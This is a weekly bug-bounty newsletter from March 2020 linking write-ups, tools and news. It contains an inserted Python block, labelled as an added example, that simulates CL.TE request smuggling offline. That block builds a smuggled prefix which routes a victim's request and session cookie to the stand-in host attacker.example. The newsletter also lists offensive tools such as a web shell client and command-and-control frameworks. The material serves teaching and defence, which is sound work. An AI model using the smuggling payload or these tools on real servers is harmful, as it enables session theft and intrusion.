By Intigriti
March 17, 2020
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from 06 to 13 March.
BSidesSF 2020, especially:
– Panel: Let’s Get 360 w/Bug Bounty!
– How To Write Like It’s Your Job
– The Voight-Kampff Test for Discovering Vulnerabilities
– Panel: Mental Health for Hackers
The range of (interesting) topics tackled in this conference is amazing. There are at least 10 talks I really need to watch. During these difficult times of Coronavirus quarantine / social distancing, this is an excellent way to pass time.
– The unexpected Google wide domain check bypass (Google, $6,000)
– Mass account takeovers using HTTP Request Smuggling on https://slackb.com/ to steal session cookies (Slack, $6,500)
These are two very impressive findings! The first one was found by analyzing a regex in obfuscated JavaScript code that was used for URL validation in a Google app. @xdavidhu found a way to bypass the check. The impact was initially low/medium, but he later found that the vulnerable code was part of a JS library shared by many Google web apps, including Gmail and Google Docs. The second vulnerability is an HTTP Request Smuggling (CL.TE) attack found on Slack. A smuggled request prefix caused victims to be redirected to an attacker-controlled Collaborator server, leaking their session cookies. The writeup is very clear, and the attack could have been exploited for mass account takeovers.
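To make the CL.TE mechanism behind the Slack report concrete, here is an added example (not code from the write-up or from this newsletter) that parses the same byte stream the way a front-end honouring Content-Length and a back-end honouring Transfer-Encoding: chunked would. The requests, the hostnames (target.example, attacker.example) and the session cookie value are constructed for illustration only.

```python
"""CL.TE request smuggling, simulated offline.

Two toy parsers read one TCP byte stream:
  * "cl" mode  - the front-end: body length comes from Content-Length
  * "te" mode  - the back-end:  body ends at the zero-length chunk

The attacker's request carries both headers, so the front-end forwards the
whole thing as one request while the back-end stops at "0\\r\\n\\r\\n" and keeps
the remainder in its buffer, where it becomes the prefix of the next
(victim's) request on the same connection.
"""

# --- constructed sample traffic (illustrative hosts, not real targets) -----
SMUGGLED_PREFIX = (
    b"GET /poison HTTP/1.1\r\n"
    b"Host: attacker.example\r\n"
    b"X-Ignore: "  # unterminated header: it swallows the victim's request line
)
ATTACKER_BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
ATTACKER_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"Content-Length: " + str(len(ATTACKER_BODY)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + ATTACKER_BODY
)
VICTIM_REQUEST = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"Cookie: session=victim-secret\r\n"
    b"\r\n"
)


def parse_head(stream):
    """Split off the request line and headers; return None if no full head yet."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        # first occurrence wins in this toy parser (real servers differ)
        headers.setdefault(name.strip().lower(), value.strip())
    return lines[0], headers, rest


def read_body(headers, rest, mode):
    """Return (body, leftover). 'te' honours chunked framing, 'cl' ignores it."""
    if mode == "te" and headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        body = b""
        while True:
            size_line, _, rest = rest.partition(b"\r\n")
            size = int(size_line.split(b";")[0], 16)  # ignore chunk extensions
            if size == 0:
                # zero-size chunk, then the terminating CRLF (no trailers here)
                if rest.startswith(b"\r\n"):
                    rest = rest[2:]
                return body, rest
            body += rest[:size]
            rest = rest[size + 2:]  # skip chunk data and its CRLF
    length = int(headers.get(b"content-length", b"0"))
    return rest[:length], rest[length:]


def parse_stream(stream, mode):
    """Split a byte stream into (request_line, headers, body) tuples.

    Returns the list of requests plus any unparsed leftover bytes."""
    requests = []
    while True:
        parsed = parse_head(stream)
        if parsed is None:
            return requests, stream
        request_line, headers, rest = parsed
        body, stream = read_body(headers, rest, mode)
        requests.append((request_line, headers, body))


def demo():
    """Parse attacker + victim traffic from both vantage points."""
    wire = ATTACKER_REQUEST + VICTIM_REQUEST
    front_end, _ = parse_stream(wire, "cl")
    back_end, _ = parse_stream(wire, "te")
    return front_end, back_end


if __name__ == "__main__":
    front, back = demo()
    print("front-end sees:", [r[0] for r in front])
    print("back-end sees: ", [r[0] for r in back])
    print("back-end request 2 headers:", back[1][1])
```

The front-end sees two ordinary requests and forwards them both. The back-end instead finishes the first request at the zero chunk and then parses the leftover prefix plus the victim's bytes as a single request: `GET /poison` with `Host: attacker.example`, the victim's original request line buried in `X-Ignore`, and the victim's `Cookie` header still attached. Any response that reflects or redirects on the Host header (which is what the Slack report abused) now sends the victim, cookie in hand, wherever the attacker chose. The fix is to make the edge and the origin agree on framing: reject or normalize requests that carry both Content-Length and Transfer-Encoding, and never reuse a back-end connection after an ambiguous request.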
@Mrtuxracer Talks About Monitoring Endpoints, Binary Exploitation, Continuous Recon and More!
This is @NahamSec’s latest interview, with @Mrtuxracer. I find it particularly interesting because of @Mrtuxracer’s approach. He explains his unique recon process, talks about continuous monitoring of JavaScript files and endpoints, some of his custom tools, API hacking, etc. This is definitely worth watching if you want to learn about bug hunting methodology, differentiating yourself, or which kind of custom tools other bug hunters are using.
Bug Bounty Hunting Tips #4 — Develop a Process and Follow It
“Admittedly, it can feel great for the first hour or so but after that, you can start to become bored and frustrated if you don’t find anything. And without a structured bug bounty hunting process, you probably won’t find anything new.” Does this ring a bell? This excellent article goes over how to create a high-level process for bug hunting. Apart from technical methodologies, some decisions can help avoid frustration. This includes choosing a bug hunting approach, deciding the minimum and maximum time to spend on a target, and the minimum time for writing reports.
Bug Business #2 – Hacking, traveling and vlogging with @STÖK
There are only two publications related to bug bounty that I wait for impatiently and devour as soon as they’re published: EdOverflow’s newsletter and this new interview series.
The first issue was with EdOverflow. This latest one is an excellent read if you want to learn how Stök juggles different projects, his filming process, and how he manages full-time bug hunting without pulling all-nighters (Early birds, hello!)…
Security Weekly News #16 – Security Weekly News Wrap Up & #17 – James Adams and the News
The Privacy, Security, & OSINT Show – 160-Telephone Search Offense & Defense
Vulnerability Scanner Fails: 5 Ways You Can’t Fake The Human Element
Innovative Application Security Testing Techniques for Modern Software Development
Abusing File System functions in web applications – steal NTLMv2 hash
Kerberosity Killed the Domain: An Offensive Kerberos Overview
Red Team Tactics: Advanced process monitoring techniques in offensive operations
Defeating RunAsPPL: Utilizing Vulnerable Drivers to Read Lsass with Mimikatz
Twisted Version 19.10.0 #Web #RequestSmuggling
Multiple vulnerabilities found in Zyxel CNM SecuManager #Network
Slack DTLS uses a private key that is in the public domain, which may lead to SRTP stream hijack (Slack, $2,000)
Disabled account can still use GraphQL endpoint (Hackerone, $500)
TURN server allows TCP and UDP proxying to internal network, localhost and meta-data services (Slack, $3,500)
Lack of input validation that can lead to Denial of Service (DoS) (Twitter, $560)
Generate valid signatures for files hosted in Facebook CDNs.
Broke limited scope with a chain of bugs (tips for every rider CORS)
BGP Search: A Python wrapper for searching on https://bgp.tools (Takes organization name as input & output IP ranges)
iprobe: Take a list of IP addresses or IP range and probe for working HTTP and HTTPS servers (similar to httprobe but also takes IPs and IP ranges as input)
HTTP-FUZZER: Go fuzzer that is burp-compatible and able to fuzz some random parameters in the raw http request
Sub-Drill: A very (very) simple Subdomain Finder based on online certification services (threatcrowd, hackertarget, crt.sh, certspotter & findsubdomains)
Exegol: A Kali light base with a few useful additional tools and some basic configuration
Brownie tub: A Standalone Web Shell Client
Starkiller & Introduction: GUI application for interfacing with Empire. It allows for multi-user support and ease of operations
NTLM scanner: A simple python tool based on Impacket that tests servers for various known NTLM vulnerabilities
Password Guesser: Script to generate custom password wordlist to guess weak passwords
Sifter: OSINT, recon & vulnerability scanner in Bash for penetration testing
Callidus & Introduction: C# tool that allows red team operators to leverage O365 services for establishing command & control communication channel
Exploit-workshop: A step by step workshop to exploit various vulnerabilities in Node.js and Java applications
Throwback Threat Thursday: WordPress 4.7 WP-JSON Content Injection Vulnerability
Busting Ghostcat: An Analysis of the Apache Tomcat Vulnerability (CVE-2020-1938 and CNVD-2020-10487)
Earn cash or a free month of Pentesterlab by contributing to @codingo_’s Interlace
Google awards $100k to Dutch bug hunter for cutting-edge cloud security research
@TheParanoids’s next Live Hacking Event in Singapore is converted into a Virtual Hacking Event
Microsoft SMBv3.11 Vulnerability and Patch CVE-2020–0796 Explained
48K Windows Hosts Vulnerable to SMBGhost CVE-2020-0796 RCE Attacks
Vulnerable TV streaming app could give attackers full control over users’ devices
Avast disables JavaScript engine in its antivirus following major bug
Avast AntiTrack certificate bug allowed others to snoop on your online activities
WordPress Terror: Researchers discover a massive 5,000 security flaws in buggy plugins
AMD processors from 2011 to 2019 vulnerable to two new attacks
Modern RAM used for computers, smartphones still vulnerable to Rowhammer attacks
Jenkins security: Latest advisory highlights more than 20 vulnerable plugins
Years-long campaign targets hackers through trojanized hacking tools
NordVPN HTTP POST bug exposed customer information, no authentication required
How poor IoT security is allowing this 12-year-old malware to make a comeback
Nvidia’s calling on gaming PC owners to put their systems to work fighting COVID-19
List of Free Software and Services During Coronavirus Outbreak
Czech hospital hit by cyberattack while in the midst of a COVID-19 outbreak
Two people who went to RSA security conference test positive for COVID-19
New US Bill Aims to Protect Researchers who Disclose Govt Backdoors
Microsoft shares nightmare tale: 6 sets of hackers on a customer’s network
Brave to generate random browser fingerprints to preserve user privacy
Google engineers open-source Linux tool that prevents USB keystroke injection attacks
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 02/06/2020 to 02/13/2020.
Curated by Pentester Land & Sponsored by Intigriti